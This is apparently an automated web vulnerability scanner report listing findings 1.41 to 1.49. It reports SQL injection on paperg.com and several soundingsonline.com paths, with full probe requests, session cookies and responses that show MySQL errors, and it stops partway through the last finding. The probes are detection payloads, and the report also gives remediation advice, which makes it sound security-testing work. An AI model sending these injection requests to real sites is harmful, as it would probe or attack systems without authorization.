Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050



1.41. https://www.paperg.com/post.php [bid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.paperg.com
Path:   /post.php

Issue detail

The bid parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the bid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /post.php?bid=2123%20and%201%3d1--%20&pid=3922&post HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;

Response 1

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:17:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <title>PaperG | Post a Flyer</title>
       
       <meta http-equiv="Content-Type" co
...[SNIP]...
<script type="text/javascript" src="https://www.paperg.com/jsfb/embed.php?rand=84590&view=pre&height=200&width=200"></script>
                           
                       </div>
                       <br /><br />
                       

                   
                       <div class="clear"></div>

                           <div align="center" >
                           <br />
<div id="lowest_cost_left_col">
                           <h3>INTRODUCTORY RATE
As low as $50/week

</h3>                             </div>
<div id="total_cost_left_col">
                               Total cost:                        
                               <h2>
<span id="estimated_cost_span" onmouseover="Tip('The cost automatically updates based on the publications you choose',WIDTH, 200)" onmouseout="UnTip();">&nbsp;</span>
<span id="estimated_cost_month_label" style="display:none;"><br />per month</span>
</h2>
                               </div>

                            <div id="total_length_left_col">
                               Total length:                        
                               <h2><span id="time_span">0 days</span></h2>
</div>

                           </div>    
                                                       <div id="multiboard_selected" align="center" style="display:none;">
                           *You will receive a discount for selecting multiple boards, which will be applied on the final confirmation screen.
                           </div>

                   </div>
               </div>
               
               <!-- END: LEFT COLUMN -->
               <!-- BEGIN: MIDDLE COLUMN -->
               <a id="cMiddle_top" name="cMiddle_top"> </a>
               <div id="cMiddle_loading" style="text-align:center;"><img src="post/waitanimation.gif" /> Loading...</div>
               <div id="cMiddle" class="post" style="display:none;">
               
                   Having trouble posting? <a href="support.php">Email us</a> or call (203)889-3358 and press 0.
                                           You can also try <a onclick="verify_reset();">starting over</a>.
                       <script type="text/javascript">
                       function verify_reset()
                       {
                           var answer = confirm("Are you sure you wish you start over? You will lose any information you have entered.");
                           if (answer)
                           {
                               wind
...[SNIP]...

Request 2

GET /post.php?bid=2123%20and%201%3d2--%20&pid=3922&post HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;

Response 2

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:17:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <title>PaperG | Post a Flyer</title>
       
       <meta http-equiv="Content-Type" co
...[SNIP]...
<script type="text/javascript" src="https://www.paperg.com/jsfb/embed.php?rand=56564&view=pre&height=200&width=200"></script>
                           
                       </div>
                       <br /><br />
                       

                   
                       <div class="clear"></div>

                           <div align="center" >
                           <br />
<div id="lowest_cost_left_col">
                           <h3>INTRODUCTORY RATE
As low as $50/week

</h3>                             </div>
<div id="total_cost_left_col">
                               Total cost:                        
                               <h2>
<span id="estimated_cost_span" onmouseover="Tip('The cost automatically updates based on the publications you choose',WIDTH, 200)" onmouseout="UnTip();">&nbsp;</span>
<span id="estimated_cost_month_label" style="display:none;"><br />per month</span>
</h2>
                               </div>

                            <div id="total_length_left_col">
                               Total length:                        
                               <h2><span id="time_span">0 days</span></h2>
</div>

                           </div>    
                                                       <div id="multiboard_selected" align="center" style="display:none;">
                           *You will receive a discount for selecting multiple boards, which will be applied on the final confirmation screen.
                           </div>

                   </div>
               </div>
               
               <!-- END: LEFT COLUMN -->
               <!-- BEGIN: MIDDLE COLUMN -->
               <a id="cMiddle_top" name="cMiddle_top"> </a>
               <div id="cMiddle_loading" style="text-align:center;"><img src="post/waitanimation.gif" /> Loading...</div>
               <div id="cMiddle" class="post" style="display:none;">
               
                   Having trouble posting? <a href="support.php">Email us</a> or call (203)889-3358 and press 0.
                                           You can also try <a onclick="verify_reset();">starting over</a>.
                       <script type="text/javascript">
                       function verify_reset()
                       {
                           var answer = confirm("Are you sure you wish you start over? You will lose any information you have entered.");
                           if (answer)
                           {
                               wind
...[SNIP]...

1.42. http://www.soundingsonline.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.43. http://www.soundingsonline.com/about-us [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /about-us

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /about-us?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /about-us?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.44. http://www.soundingsonline.com/advertise [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /advertise

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /advertise?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /advertise?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.45. http://www.soundingsonline.com/archives [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /archives?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /archives?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.46. http://www.soundingsonline.com/boat-shop [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.47. http://www.soundingsonline.com/boat-shop/know-how [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/know-how

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/know-how?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/know-how?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.48. http://www.soundingsonline.com/boat-shop/new-boats [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/new-boats

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/new-boats?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/new-boats?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.49. http://www.soundingsonline.com/boat-shop/new-gear [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/new-gear

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/new-gear?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

